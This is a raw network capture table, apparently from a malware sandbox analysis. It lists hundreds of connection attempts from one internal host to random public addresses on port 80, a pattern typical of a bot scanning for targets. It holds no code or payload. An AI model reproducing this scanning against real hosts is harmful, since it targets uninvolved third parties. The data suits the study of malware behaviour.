                                          Nov 7, 2024 11:57:58.425793886 CET3044880192.168.2.1337.217.170.198
                                          Nov 7, 2024 11:57:58.425796986 CET3044880192.168.2.1337.128.160.227
                                          Nov 7, 2024 11:57:58.425800085 CET228880192.168.2.13206.176.152.76
                                          Nov 7, 2024 11:57:58.425808907 CET3044880192.168.2.1337.179.21.195
                                          Nov 7, 2024 11:57:58.425810099 CET228880192.168.2.13206.99.60.244
                                          Nov 7, 2024 11:57:58.425817966 CET3044880192.168.2.1337.242.79.233
                                          Nov 7, 2024 11:57:58.425827980 CET228880192.168.2.13206.13.152.160
                                          Nov 7, 2024 11:57:58.425827980 CET228880192.168.2.13206.197.40.54
                                          Nov 7, 2024 11:57:58.425827980 CET3044880192.168.2.1337.40.118.240
                                          Nov 7, 2024 11:57:58.425831079 CET3044880192.168.2.1337.105.229.2
                                          Nov 7, 2024 11:57:58.425843954 CET3044880192.168.2.1337.49.228.65
                                          Nov 7, 2024 11:57:58.425851107 CET3044880192.168.2.1337.73.45.134
                                          Nov 7, 2024 11:57:58.425851107 CET3044880192.168.2.1337.33.146.76
                                          Nov 7, 2024 11:57:58.425851107 CET3044880192.168.2.1337.89.58.248
                                          Nov 7, 2024 11:57:58.425858021 CET228880192.168.2.13206.25.17.58
                                          Nov 7, 2024 11:57:58.425858974 CET3044880192.168.2.1337.142.59.218
                                          Nov 7, 2024 11:57:58.425860882 CET3044880192.168.2.1337.194.59.183
                                          Nov 7, 2024 11:57:58.425878048 CET3044880192.168.2.1337.204.216.171
                                          Nov 7, 2024 11:57:58.425879002 CET3044880192.168.2.1337.196.224.29
                                          Nov 7, 2024 11:57:58.425883055 CET3044880192.168.2.1337.212.102.62
                                          Nov 7, 2024 11:57:58.425884008 CET3044880192.168.2.1337.52.66.74
                                          Nov 7, 2024 11:57:58.425884008 CET3044880192.168.2.1337.195.73.227
                                          Nov 7, 2024 11:57:58.425893068 CET228880192.168.2.13206.123.245.160
                                          Nov 7, 2024 11:57:58.425893068 CET3044880192.168.2.1337.67.239.50
                                          Nov 7, 2024 11:57:58.425908089 CET3044880192.168.2.1337.80.202.146
                                          Nov 7, 2024 11:57:58.425916910 CET228880192.168.2.13206.80.240.90
                                          Nov 7, 2024 11:57:58.425916910 CET3044880192.168.2.1337.223.167.4
                                          Nov 7, 2024 11:57:58.425921917 CET3044880192.168.2.1337.128.16.203
                                          Nov 7, 2024 11:57:58.425923109 CET3044880192.168.2.1337.118.148.130
                                          Nov 7, 2024 11:57:58.425930977 CET3044880192.168.2.1337.148.183.51
                                          Nov 7, 2024 11:57:58.425932884 CET3044880192.168.2.1337.197.108.116
                                          Nov 7, 2024 11:57:58.425940990 CET3044880192.168.2.1337.64.140.187
                                          Nov 7, 2024 11:57:58.425941944 CET3044880192.168.2.1337.52.144.67
                                          Nov 7, 2024 11:57:58.425954103 CET3044880192.168.2.1337.48.219.44
                                          Nov 7, 2024 11:57:58.425955057 CET228880192.168.2.13206.167.72.189
                                          Nov 7, 2024 11:57:58.425966024 CET3044880192.168.2.1337.69.152.121
                                          Nov 7, 2024 11:57:58.425967932 CET3044880192.168.2.1337.200.161.196
                                          Nov 7, 2024 11:57:58.425968885 CET3044880192.168.2.1337.76.78.170
                                          Nov 7, 2024 11:57:58.425967932 CET3044880192.168.2.1337.198.53.6
                                          Nov 7, 2024 11:57:58.425976992 CET3044880192.168.2.1337.44.246.109
                                          Nov 7, 2024 11:57:58.425981998 CET3044880192.168.2.1337.163.89.253
                                          Nov 7, 2024 11:57:58.425981998 CET228880192.168.2.13206.136.39.118
                                          Nov 7, 2024 11:57:58.425988913 CET3044880192.168.2.1337.100.226.183
                                          Nov 7, 2024 11:57:58.425988913 CET3044880192.168.2.1337.117.57.137
                                          Nov 7, 2024 11:57:58.425990105 CET3044880192.168.2.1337.46.228.210
                                          Nov 7, 2024 11:57:58.425990105 CET3044880192.168.2.1337.194.117.174
                                          Nov 7, 2024 11:57:58.425990105 CET3044880192.168.2.1337.60.247.35
                                          Nov 7, 2024 11:57:58.425990105 CET3044880192.168.2.1337.41.160.218
                                          Nov 7, 2024 11:57:58.425995111 CET3044880192.168.2.1337.28.224.65
                                          Nov 7, 2024 11:57:58.425995111 CET228880192.168.2.13206.77.189.65
                                          Nov 7, 2024 11:57:58.425995111 CET228880192.168.2.13206.112.32.198
                                          Nov 7, 2024 11:57:58.426001072 CET228880192.168.2.13206.96.42.124
                                          Nov 7, 2024 11:57:58.426002979 CET3044880192.168.2.1337.242.69.93
                                          Nov 7, 2024 11:57:58.426009893 CET228880192.168.2.13206.11.18.69
                                          Nov 7, 2024 11:57:58.426009893 CET3044880192.168.2.1337.22.16.129
                                          Nov 7, 2024 11:57:58.426014900 CET3044880192.168.2.1337.171.162.141
                                          Nov 7, 2024 11:57:58.426017046 CET228880192.168.2.13206.137.39.12
                                          Nov 7, 2024 11:57:58.426017046 CET3044880192.168.2.1337.173.170.142
                                          Nov 7, 2024 11:57:58.426017046 CET3044880192.168.2.1337.73.185.255
                                          Nov 7, 2024 11:57:58.426017046 CET3044880192.168.2.1337.166.33.52
                                          Nov 7, 2024 11:57:58.426024914 CET228880192.168.2.13206.194.211.228
                                          Nov 7, 2024 11:57:58.426024914 CET3044880192.168.2.1337.195.116.205
                                          Nov 7, 2024 11:57:58.426024914 CET3044880192.168.2.1337.33.162.69
                                          Nov 7, 2024 11:57:58.426028013 CET228880192.168.2.13206.50.50.204
                                          Nov 7, 2024 11:57:58.426028967 CET3044880192.168.2.1337.32.217.166
                                          Nov 7, 2024 11:57:58.426028967 CET3044880192.168.2.1337.68.27.10
                                          Nov 7, 2024 11:57:58.426028967 CET3044880192.168.2.1337.144.136.28
                                          Nov 7, 2024 11:57:58.426059961 CET228880192.168.2.13206.35.42.201
                                          Nov 7, 2024 11:57:58.426069975 CET228880192.168.2.13206.202.132.151
                                          Nov 7, 2024 11:57:58.426069975 CET228880192.168.2.13206.68.114.61
                                          Nov 7, 2024 11:57:58.426083088 CET228880192.168.2.13206.118.187.17
                                          Nov 7, 2024 11:57:58.426090956 CET228880192.168.2.13206.109.31.193
                                          Nov 7, 2024 11:57:58.426121950 CET228880192.168.2.13206.236.105.134
                                          Nov 7, 2024 11:57:58.426134109 CET228880192.168.2.13206.53.244.195
                                          Nov 7, 2024 11:57:58.426135063 CET228880192.168.2.13206.50.83.14
                                          Nov 7, 2024 11:57:58.426155090 CET228880192.168.2.13206.143.39.127
                                          Nov 7, 2024 11:57:58.426167011 CET228880192.168.2.13206.218.12.160
                                          Nov 7, 2024 11:57:58.426167011 CET228880192.168.2.13206.114.253.121
                                          Nov 7, 2024 11:57:58.426167011 CET228880192.168.2.13206.194.134.242
                                          Nov 7, 2024 11:57:58.426187992 CET228880192.168.2.13206.71.195.195
                                          Nov 7, 2024 11:57:58.426235914 CET228880192.168.2.13206.85.15.119
                                          Nov 7, 2024 11:57:58.426239967 CET228880192.168.2.13206.130.112.52
                                          Nov 7, 2024 11:57:58.426244020 CET228880192.168.2.13206.211.97.117
                                          Nov 7, 2024 11:57:58.426259995 CET228880192.168.2.13206.27.64.154
                                          Nov 7, 2024 11:57:58.426263094 CET228880192.168.2.13206.200.26.202
                                          Nov 7, 2024 11:57:58.426281929 CET228880192.168.2.13206.68.67.237
                                          Nov 7, 2024 11:57:58.426285028 CET228880192.168.2.13206.33.76.181
                                          Nov 7, 2024 11:57:58.426320076 CET228880192.168.2.13206.94.239.51
                                          Nov 7, 2024 11:57:58.426331997 CET228880192.168.2.13206.221.126.49
                                          Nov 7, 2024 11:57:58.426338911 CET228880192.168.2.13206.202.130.126
                                          Nov 7, 2024 11:57:58.426342964 CET228880192.168.2.13206.50.137.6
                                          Nov 7, 2024 11:57:58.426378012 CET228880192.168.2.13206.41.25.248
                                          Nov 7, 2024 11:57:58.426392078 CET228880192.168.2.13206.181.154.132
                                          Nov 7, 2024 11:57:58.426404953 CET228880192.168.2.13206.36.52.239
                                          Nov 7, 2024 11:57:58.426409006 CET228880192.168.2.13206.186.142.52
                                          Nov 7, 2024 11:57:58.426451921 CET228880192.168.2.13206.95.162.212
                                          Nov 7, 2024 11:57:58.426455975 CET228880192.168.2.13206.217.79.151
                                          Nov 7, 2024 11:57:58.426465034 CET228880192.168.2.13206.241.158.63
                                          Nov 7, 2024 11:57:58.426470995 CET228880192.168.2.13206.198.195.128
                                          Nov 7, 2024 11:57:58.426475048 CET228880192.168.2.13206.80.106.128
                                          Nov 7, 2024 11:57:58.426490068 CET228880192.168.2.13206.176.128.57
                                          Nov 7, 2024 11:57:58.426493883 CET228880192.168.2.13206.246.86.34
                                          Nov 7, 2024 11:57:58.426502943 CET228880192.168.2.13206.119.133.208
                                          Nov 7, 2024 11:57:58.426544905 CET228880192.168.2.13206.49.200.199
                                          Nov 7, 2024 11:57:58.426553011 CET228880192.168.2.13206.233.68.2
                                          Nov 7, 2024 11:57:58.426556110 CET228880192.168.2.13206.68.175.7
                                          Nov 7, 2024 11:57:58.426569939 CET228880192.168.2.13206.104.202.254
                                          Nov 7, 2024 11:57:58.426578045 CET228880192.168.2.13206.9.177.124
                                          Nov 7, 2024 11:57:58.426590919 CET228880192.168.2.13206.143.6.3
                                          Nov 7, 2024 11:57:58.426594019 CET228880192.168.2.13206.180.196.210
                                          Nov 7, 2024 11:57:58.426635027 CET228880192.168.2.13206.184.204.85
                                          Nov 7, 2024 11:57:58.426645994 CET228880192.168.2.13206.106.124.206
                                          Nov 7, 2024 11:57:58.426661968 CET228880192.168.2.13206.216.227.175
                                          Nov 7, 2024 11:57:58.426666975 CET228880192.168.2.13206.105.37.207
                                          Nov 7, 2024 11:57:58.426681042 CET228880192.168.2.13206.228.54.34
                                          Nov 7, 2024 11:57:58.426713943 CET228880192.168.2.13206.18.129.17
                                          Nov 7, 2024 11:57:58.426728964 CET228880192.168.2.13206.126.56.27
                                          Nov 7, 2024 11:57:58.426732063 CET228880192.168.2.13206.146.219.41
                                          Nov 7, 2024 11:57:58.426732063 CET228880192.168.2.13206.79.203.149
                                          Nov 7, 2024 11:57:58.426743984 CET228880192.168.2.13206.118.30.88
                                          Nov 7, 2024 11:57:58.426769972 CET228880192.168.2.13206.151.182.28
                                          Nov 7, 2024 11:57:58.426769972 CET228880192.168.2.13206.166.145.2
                                          Nov 7, 2024 11:57:58.426769972 CET228880192.168.2.13206.102.112.5
                                          Nov 7, 2024 11:57:58.426798105 CET228880192.168.2.13206.198.155.173
                                          Nov 7, 2024 11:57:58.426816940 CET228880192.168.2.13206.210.228.113
                                          Nov 7, 2024 11:57:58.426822901 CET228880192.168.2.13206.110.77.247
                                          Nov 7, 2024 11:57:58.426826954 CET228880192.168.2.13206.162.98.119
                                          Nov 7, 2024 11:57:58.426845074 CET228880192.168.2.13206.101.160.234
                                          Nov 7, 2024 11:57:58.426847935 CET228880192.168.2.13206.12.95.139
                                          Nov 7, 2024 11:57:58.426852942 CET228880192.168.2.13206.125.69.2
                                          Nov 7, 2024 11:57:58.426860094 CET228880192.168.2.13206.172.221.204
                                          Nov 7, 2024 11:57:58.426897049 CET228880192.168.2.13206.185.154.63
                                          Nov 7, 2024 11:57:58.426906109 CET228880192.168.2.13206.54.35.27
                                          Nov 7, 2024 11:57:58.426912069 CET228880192.168.2.13206.29.253.16
                                          Nov 7, 2024 11:57:58.426925898 CET228880192.168.2.13206.246.151.199
                                          Nov 7, 2024 11:57:58.426958084 CET228880192.168.2.13206.158.165.251
                                          Nov 7, 2024 11:57:58.426964045 CET228880192.168.2.13206.243.151.119
                                          Nov 7, 2024 11:57:58.426980019 CET228880192.168.2.13206.192.169.218
                                          Nov 7, 2024 11:57:58.426989079 CET228880192.168.2.13206.163.112.65
                                          Nov 7, 2024 11:57:58.427031994 CET228880192.168.2.13206.105.226.129
                                          Nov 7, 2024 11:57:58.427066088 CET228880192.168.2.13206.187.237.162
                                          Nov 7, 2024 11:57:58.427089930 CET228880192.168.2.13206.253.165.63
                                          Nov 7, 2024 11:57:58.427100897 CET228880192.168.2.13206.6.55.203
                                          Nov 7, 2024 11:57:58.427114010 CET228880192.168.2.13206.178.166.223
                                          Nov 7, 2024 11:57:58.427114964 CET228880192.168.2.13206.42.124.95
                                          Nov 7, 2024 11:57:58.427114010 CET228880192.168.2.13206.135.90.44
                                          Nov 7, 2024 11:57:58.427114964 CET228880192.168.2.13206.10.30.55
                                          Nov 7, 2024 11:57:58.427130938 CET228880192.168.2.13206.17.238.203
                                          Nov 7, 2024 11:57:58.427135944 CET228880192.168.2.13206.222.68.248
                                          Nov 7, 2024 11:57:58.427150011 CET228880192.168.2.13206.203.174.254
                                          Nov 7, 2024 11:57:58.427160025 CET228880192.168.2.13206.176.245.79
                                          Nov 7, 2024 11:57:58.427192926 CET228880192.168.2.13206.57.133.42
                                          Nov 7, 2024 11:57:58.427207947 CET228880192.168.2.13206.156.165.178
                                          Nov 7, 2024 11:57:58.427215099 CET228880192.168.2.13206.54.238.213
                                          Nov 7, 2024 11:57:58.427220106 CET228880192.168.2.13206.153.88.171
                                          Nov 7, 2024 11:57:58.427232027 CET228880192.168.2.13206.164.209.195
                                          Nov 7, 2024 11:57:58.427238941 CET228880192.168.2.13206.51.51.140
                                          Nov 7, 2024 11:57:58.427252054 CET228880192.168.2.13206.18.152.253
                                          Nov 7, 2024 11:57:58.427252054 CET228880192.168.2.13206.67.95.110
                                          Nov 7, 2024 11:57:58.427294970 CET228880192.168.2.13206.131.10.233
                                          Nov 7, 2024 11:57:58.427303076 CET228880192.168.2.13206.98.111.12
                                          Nov 7, 2024 11:57:58.427321911 CET228880192.168.2.13206.255.11.152
                                          Nov 7, 2024 11:57:58.427325964 CET228880192.168.2.13206.5.46.191
                                          Nov 7, 2024 11:57:58.427331924 CET228880192.168.2.13206.14.169.94
                                          Nov 7, 2024 11:57:58.427370071 CET228880192.168.2.13206.11.245.108
                                          Nov 7, 2024 11:57:58.427381039 CET228880192.168.2.13206.139.216.48
                                          Nov 7, 2024 11:57:58.427383900 CET228880192.168.2.13206.212.45.149
                                          Nov 7, 2024 11:57:58.427405119 CET228880192.168.2.13206.7.84.223
                                          Nov 7, 2024 11:57:58.427413940 CET228880192.168.2.13206.144.213.115
                                          Nov 7, 2024 11:57:58.427445889 CET228880192.168.2.13206.248.2.63
                                          Nov 7, 2024 11:57:58.427448988 CET228880192.168.2.13206.172.123.72
                                          Nov 7, 2024 11:57:58.427468061 CET228880192.168.2.13206.197.84.156
                                          Nov 7, 2024 11:57:58.427469015 CET228880192.168.2.13206.118.108.51
                                          Nov 7, 2024 11:57:58.427485943 CET228880192.168.2.13206.129.28.104
                                          Nov 7, 2024 11:57:58.427489042 CET228880192.168.2.13206.26.124.181
                                          Nov 7, 2024 11:57:58.427491903 CET228880192.168.2.13206.41.169.128
                                          Nov 7, 2024 11:57:58.427501917 CET228880192.168.2.13206.78.195.216
                                          Nov 7, 2024 11:57:58.427501917 CET228880192.168.2.13206.4.6.174
                                          Nov 7, 2024 11:57:58.427510977 CET228880192.168.2.13206.243.66.66
                                          Nov 7, 2024 11:57:58.427519083 CET228880192.168.2.13206.84.222.253
                                          Nov 7, 2024 11:57:58.427561045 CET228880192.168.2.13206.236.53.142
                                          Nov 7, 2024 11:57:58.427566051 CET228880192.168.2.13206.77.92.236
                                          Nov 7, 2024 11:57:58.427572012 CET228880192.168.2.13206.108.171.233
                                          Nov 7, 2024 11:57:58.427580118 CET228880192.168.2.13206.17.45.125
                                          Nov 7, 2024 11:57:58.427587032 CET228880192.168.2.13206.120.26.253
                                          Nov 7, 2024 11:57:58.427608013 CET228880192.168.2.13206.213.196.24
                                          Nov 7, 2024 11:57:58.427635908 CET228880192.168.2.13206.83.54.72
                                          Nov 7, 2024 11:57:58.427654982 CET228880192.168.2.13206.12.241.104
                                          Nov 7, 2024 11:57:58.427670956 CET228880192.168.2.13206.107.141.195
                                          Nov 7, 2024 11:57:58.427674055 CET228880192.168.2.13206.142.60.151
                                          Nov 7, 2024 11:57:58.427675962 CET228880192.168.2.13206.59.123.245
                                          Nov 7, 2024 11:57:58.427704096 CET228880192.168.2.13206.114.205.216
                                          Nov 7, 2024 11:57:58.427715063 CET228880192.168.2.13206.4.15.148
                                          Nov 7, 2024 11:57:58.427726984 CET228880192.168.2.13206.163.244.206
                                          Nov 7, 2024 11:57:58.427752018 CET228880192.168.2.13206.199.117.121
                                          Nov 7, 2024 11:57:58.427772045 CET228880192.168.2.13206.146.159.187
                                          Nov 7, 2024 11:57:58.427772045 CET228880192.168.2.13206.42.164.85
                                          Nov 7, 2024 11:57:58.427791119 CET228880192.168.2.13206.120.95.43
                                          Nov 7, 2024 11:57:58.427791119 CET228880192.168.2.13206.183.18.61
                                          Nov 7, 2024 11:57:58.427808046 CET228880192.168.2.13206.67.25.8
                                          Nov 7, 2024 11:57:58.427814007 CET228880192.168.2.13206.127.83.114
                                          Nov 7, 2024 11:57:58.427855968 CET228880192.168.2.13206.184.80.215
                                          Nov 7, 2024 11:57:58.427861929 CET228880192.168.2.13206.78.157.72
                                          Nov 7, 2024 11:57:58.427874088 CET228880192.168.2.13206.111.129.172
                                          Nov 7, 2024 11:57:58.427887917 CET228880192.168.2.13206.225.254.118
                                          Nov 7, 2024 11:57:58.427923918 CET228880192.168.2.13206.53.196.51
                                          Nov 7, 2024 11:57:58.427937984 CET228880192.168.2.13206.246.240.154
                                          Nov 7, 2024 11:57:58.427953005 CET228880192.168.2.13206.94.150.174
                                          Nov 7, 2024 11:57:58.427954912 CET228880192.168.2.13206.252.90.214
                                          Nov 7, 2024 11:57:58.427985907 CET228880192.168.2.13206.15.73.87
                                          Nov 7, 2024 11:57:58.427999973 CET228880192.168.2.13206.164.177.135
                                          Nov 7, 2024 11:57:58.428009987 CET228880192.168.2.13206.30.33.111
                                          Nov 7, 2024 11:57:58.428020954 CET228880192.168.2.13206.29.15.137
                                          Nov 7, 2024 11:57:58.428030014 CET228880192.168.2.13206.255.207.234
                                          Nov 7, 2024 11:57:58.428035975 CET228880192.168.2.13206.193.105.35
                                          Nov 7, 2024 11:57:58.428070068 CET228880192.168.2.13206.255.59.209
                                          Nov 7, 2024 11:57:58.428081989 CET228880192.168.2.13206.145.169.152
                                          Nov 7, 2024 11:57:58.428086042 CET228880192.168.2.13206.155.11.1
                                          Nov 7, 2024 11:57:58.428102016 CET228880192.168.2.13206.90.60.58
                                          Nov 7, 2024 11:57:58.428105116 CET228880192.168.2.13206.68.62.100
                                          Nov 7, 2024 11:57:58.428145885 CET228880192.168.2.13206.54.88.9
                                          Nov 7, 2024 11:57:58.428163052 CET228880192.168.2.13206.199.4.20
                                          Nov 7, 2024 11:57:58.428179979 CET803044837.195.202.171192.168.2.13
                                          Nov 7, 2024 11:57:58.428184986 CET228880192.168.2.13206.191.84.104
                                          Nov 7, 2024 11:57:58.428184032 CET228880192.168.2.13206.138.98.131
                                          Nov 7, 2024 11:57:58.428184986 CET228880192.168.2.13206.103.240.51
                                          Nov 7, 2024 11:57:58.428189039 CET228880192.168.2.13206.132.115.237
                                          Nov 7, 2024 11:57:58.428189993 CET228880192.168.2.13206.43.220.35
                                          Nov 7, 2024 11:57:58.428196907 CET228880192.168.2.13206.224.76.91
                                          Nov 7, 2024 11:57:58.428203106 CET228880192.168.2.13206.154.46.97
                                          Nov 7, 2024 11:57:58.428203106 CET228880192.168.2.13206.213.119.98
                                          Nov 7, 2024 11:57:58.428206921 CET228880192.168.2.13206.193.70.207
                                          Nov 7, 2024 11:57:58.428215027 CET3044880192.168.2.1337.195.202.171
                                          Nov 7, 2024 11:57:58.428220987 CET228880192.168.2.13206.205.44.155
                                          Nov 7, 2024 11:57:58.428220987 CET228880192.168.2.13206.20.41.112
                                          Nov 7, 2024 11:57:58.428241014 CET228880192.168.2.13206.190.255.137
                                          Nov 7, 2024 11:57:58.428255081 CET228880192.168.2.13206.237.250.222
                                          Nov 7, 2024 11:57:58.428261995 CET228880192.168.2.13206.196.200.226
                                          Nov 7, 2024 11:57:58.428267002 CET228880192.168.2.13206.8.131.91
                                          Nov 7, 2024 11:57:58.428306103 CET228880192.168.2.13206.156.10.228
                                          Nov 7, 2024 11:57:58.428316116 CET228880192.168.2.13206.171.174.32
                                          Nov 7, 2024 11:57:58.428318977 CET228880192.168.2.13206.164.65.202
                                          Nov 7, 2024 11:57:58.428323030 CET228880192.168.2.13206.129.127.188
                                          Nov 7, 2024 11:57:58.428345919 CET228880192.168.2.13206.187.72.228
                                          Nov 7, 2024 11:57:58.428373098 CET228880192.168.2.13206.193.96.183
                                          Nov 7, 2024 11:57:58.428384066 CET228880192.168.2.13206.69.121.105
                                          Nov 7, 2024 11:57:58.428390026 CET228880192.168.2.13206.151.178.137
                                          Nov 7, 2024 11:57:58.428405046 CET228880192.168.2.13206.160.126.129
                                          Nov 7, 2024 11:57:58.428442955 CET228880192.168.2.13206.14.172.199
                                          Nov 7, 2024 11:57:58.428455114 CET228880192.168.2.13206.16.48.66
                                          Nov 7, 2024 11:57:58.428462029 CET228880192.168.2.13206.46.222.106
                                          Nov 7, 2024 11:57:58.428467035 CET228880192.168.2.13206.235.45.219
                                          Nov 7, 2024 11:57:58.428468943 CET228880192.168.2.13206.202.38.209
                                          Nov 7, 2024 11:57:58.428514957 CET228880192.168.2.13206.229.57.166
                                          Nov 7, 2024 11:57:58.428534985 CET228880192.168.2.13206.244.207.229
                                          Nov 7, 2024 11:57:58.428534985 CET228880192.168.2.13206.226.110.140
                                          Nov 7, 2024 11:57:58.428539991 CET228880192.168.2.13206.48.113.235
                                          Nov 7, 2024 11:57:58.428548098 CET228880192.168.2.13206.74.157.10
                                          Nov 7, 2024 11:57:58.428549051 CET228880192.168.2.13206.197.215.55
                                          Nov 7, 2024 11:57:58.428560019 CET228880192.168.2.13206.77.217.246
                                          Nov 7, 2024 11:57:58.428560019 CET228880192.168.2.13206.23.224.27
                                          Nov 7, 2024 11:57:58.428566933 CET228880192.168.2.13206.13.109.191
                                          Nov 7, 2024 11:57:58.428579092 CET228880192.168.2.13206.149.167.185
                                          Nov 7, 2024 11:57:58.428591013 CET228880192.168.2.13206.51.88.212
                                          Nov 7, 2024 11:57:58.428617001 CET228880192.168.2.13206.183.0.219
                                          Nov 7, 2024 11:57:58.428637028 CET228880192.168.2.13206.207.22.151
                                          Nov 7, 2024 11:57:58.428647041 CET228880192.168.2.13206.96.135.89
                                          Nov 7, 2024 11:57:58.428653955 CET228880192.168.2.13206.0.51.229
                                          Nov 7, 2024 11:57:58.428662062 CET228880192.168.2.13206.192.129.1
                                          Nov 7, 2024 11:57:58.428699017 CET228880192.168.2.13206.252.24.89
                                          Nov 7, 2024 11:57:58.428702116 CET228880192.168.2.13206.201.232.31
                                          Nov 7, 2024 11:57:58.428723097 CET228880192.168.2.13206.94.22.3
                                          Nov 7, 2024 11:57:58.428725004 CET228880192.168.2.13206.228.251.115
                                          Nov 7, 2024 11:57:58.428730965 CET228880192.168.2.13206.151.9.246
                                          Nov 7, 2024 11:57:58.428776979 CET228880192.168.2.13206.59.198.118
                                          Nov 7, 2024 11:57:58.428776979 CET228880192.168.2.13206.202.216.87
                                          Nov 7, 2024 11:57:58.428793907 CET228880192.168.2.13206.29.95.121
                                          Nov 7, 2024 11:57:58.428795099 CET228880192.168.2.13206.175.46.167
                                          Nov 7, 2024 11:57:58.428823948 CET228880192.168.2.13206.29.110.46
                                          Nov 7, 2024 11:57:58.428833961 CET228880192.168.2.13206.23.204.115
                                          Nov 7, 2024 11:57:58.428848028 CET228880192.168.2.13206.193.177.90
                                          Nov 7, 2024 11:57:58.428852081 CET228880192.168.2.13206.215.108.144
                                          Nov 7, 2024 11:57:58.428872108 CET228880192.168.2.13206.230.114.45
                                          Nov 7, 2024 11:57:58.428894997 CET228880192.168.2.13206.214.230.17
                                          Nov 7, 2024 11:57:58.428900957 CET228880192.168.2.13206.245.75.168
                                          Nov 7, 2024 11:57:58.428909063 CET228880192.168.2.13206.124.54.99
                                          Nov 7, 2024 11:57:58.428911924 CET228880192.168.2.13206.184.4.34
                                          Nov 7, 2024 11:57:58.428935051 CET228880192.168.2.13206.220.28.169
                                          Nov 7, 2024 11:57:58.428972006 CET228880192.168.2.13206.47.61.197
                                          Nov 7, 2024 11:57:58.428972006 CET228880192.168.2.13206.84.180.63
                                          Nov 7, 2024 11:57:58.428980112 CET228880192.168.2.13206.202.204.3
                                          Nov 7, 2024 11:57:58.428997993 CET228880192.168.2.13206.109.175.183
                                          Nov 7, 2024 11:57:58.428998947 CET228880192.168.2.13206.252.159.225
                                          Nov 7, 2024 11:57:58.429012060 CET228880192.168.2.13206.81.15.77
                                          Nov 7, 2024 11:57:58.429047108 CET228880192.168.2.13206.138.125.228
                                          Nov 7, 2024 11:57:58.429047108 CET228880192.168.2.13206.153.130.205
                                          Nov 7, 2024 11:57:58.429061890 CET228880192.168.2.13206.89.35.72
                                          Nov 7, 2024 11:57:58.429075003 CET228880192.168.2.13206.73.150.224
                                          Nov 7, 2024 11:57:58.429075956 CET228880192.168.2.13206.98.230.129
                                          Nov 7, 2024 11:57:58.429081917 CET228880192.168.2.13206.197.170.225
                                          Nov 7, 2024 11:57:58.429121017 CET228880192.168.2.13206.191.32.7
                                          Nov 7, 2024 11:57:58.429126978 CET228880192.168.2.13206.0.128.52
                                          Nov 7, 2024 11:57:58.429136038 CET228880192.168.2.13206.32.85.58
                                          Nov 7, 2024 11:57:58.429153919 CET228880192.168.2.13206.213.236.110
                                          Nov 7, 2024 11:57:58.429156065 CET228880192.168.2.13206.50.162.159
                                          Nov 7, 2024 11:57:58.429193020 CET228880192.168.2.13206.113.99.195
                                          Nov 7, 2024 11:57:58.429203987 CET228880192.168.2.13206.148.17.67
                                          Nov 7, 2024 11:57:58.429220915 CET228880192.168.2.13206.8.207.22
                                          Nov 7, 2024 11:57:58.429260969 CET228880192.168.2.13206.206.234.73
                                          Nov 7, 2024 11:57:58.429265022 CET228880192.168.2.13206.17.192.10
                                          Nov 7, 2024 11:57:58.429272890 CET228880192.168.2.13206.192.42.48
                                          Nov 7, 2024 11:57:58.429286957 CET228880192.168.2.13206.178.53.123
                                          Nov 7, 2024 11:57:58.429289103 CET228880192.168.2.13206.63.204.76
                                          Nov 7, 2024 11:57:58.429310083 CET228880192.168.2.13206.55.158.74
                                          Nov 7, 2024 11:57:58.429312944 CET228880192.168.2.13206.100.175.66
                                          Nov 7, 2024 11:57:58.429322958 CET228880192.168.2.13206.34.10.8
                                          Nov 7, 2024 11:57:58.429373026 CET228880192.168.2.13206.120.136.228
                                          Nov 7, 2024 11:57:58.429383993 CET228880192.168.2.13206.228.26.69
                                          Nov 7, 2024 11:57:58.429405928 CET228880192.168.2.13206.252.28.94
                                          Nov 7, 2024 11:57:58.429405928 CET228880192.168.2.13206.59.39.183
                                          Nov 7, 2024 11:57:58.429423094 CET228880192.168.2.13206.59.2.46
                                          Nov 7, 2024 11:57:58.429440975 CET228880192.168.2.13206.234.224.123
                                          Nov 7, 2024 11:57:58.429461956 CET228880192.168.2.13206.106.148.116
                                          Nov 7, 2024 11:57:58.429465055 CET228880192.168.2.13206.148.197.222
                                          Nov 7, 2024 11:57:58.429482937 CET228880192.168.2.13206.108.200.217
                                          Nov 7, 2024 11:57:58.429519892 CET228880192.168.2.13206.155.251.135
                                          Nov 7, 2024 11:57:58.429533005 CET228880192.168.2.13206.145.198.230
                                          Nov 7, 2024 11:57:58.429537058 CET228880192.168.2.13206.215.111.206
                                          Nov 7, 2024 11:57:58.429550886 CET228880192.168.2.13206.209.249.101
                                          Nov 7, 2024 11:57:58.429553032 CET228880192.168.2.13206.219.24.78
                                          Nov 7, 2024 11:57:58.429563999 CET228880192.168.2.13206.105.78.234
                                          Nov 7, 2024 11:57:58.429568052 CET228880192.168.2.13206.166.173.244
                                          Nov 7, 2024 11:57:58.429599047 CET228880192.168.2.13206.129.17.42
                                          Nov 7, 2024 11:57:58.429610968 CET228880192.168.2.13206.64.108.89
                                          Nov 7, 2024 11:57:58.429614067 CET228880192.168.2.13206.180.89.57
                                          Nov 7, 2024 11:57:58.429627895 CET228880192.168.2.13206.193.120.134
                                          Nov 7, 2024 11:57:58.429642916 CET228880192.168.2.13206.122.70.245
                                          Nov 7, 2024 11:57:58.429680109 CET228880192.168.2.13206.217.204.87
                                          Nov 7, 2024 11:57:58.429680109 CET228880192.168.2.13206.56.179.231
                                          Nov 7, 2024 11:57:58.429701090 CET228880192.168.2.13206.59.76.89
                                          Nov 7, 2024 11:57:58.429713964 CET228880192.168.2.13206.147.185.243
                                          Nov 7, 2024 11:57:58.429733038 CET228880192.168.2.13206.238.95.0
                                          Nov 7, 2024 11:57:58.429750919 CET228880192.168.2.13206.27.222.214
                                          Nov 7, 2024 11:57:58.429750919 CET228880192.168.2.13206.23.116.160
                                          Nov 7, 2024 11:57:58.429763079 CET228880192.168.2.13206.35.210.231
                                          Nov 7, 2024 11:57:58.429766893 CET228880192.168.2.13206.86.13.5
                                          Nov 7, 2024 11:57:58.429779053 CET228880192.168.2.13206.65.34.26
                                          Nov 7, 2024 11:57:58.429785967 CET228880192.168.2.13206.223.85.81
                                          Nov 7, 2024 11:57:58.429817915 CET228880192.168.2.13206.23.157.230
                                          Nov 7, 2024 11:57:58.429833889 CET228880192.168.2.13206.105.19.10
                                          Nov 7, 2024 11:57:58.429838896 CET228880192.168.2.13206.17.30.59
                                          Nov 7, 2024 11:57:58.429853916 CET228880192.168.2.13206.227.131.95
                                          Nov 7, 2024 11:57:58.429871082 CET228880192.168.2.13206.225.26.43
                                          Nov 7, 2024 11:57:58.429898024 CET228880192.168.2.13206.100.13.194
                                          Nov 7, 2024 11:57:58.429902077 CET228880192.168.2.13206.178.47.254
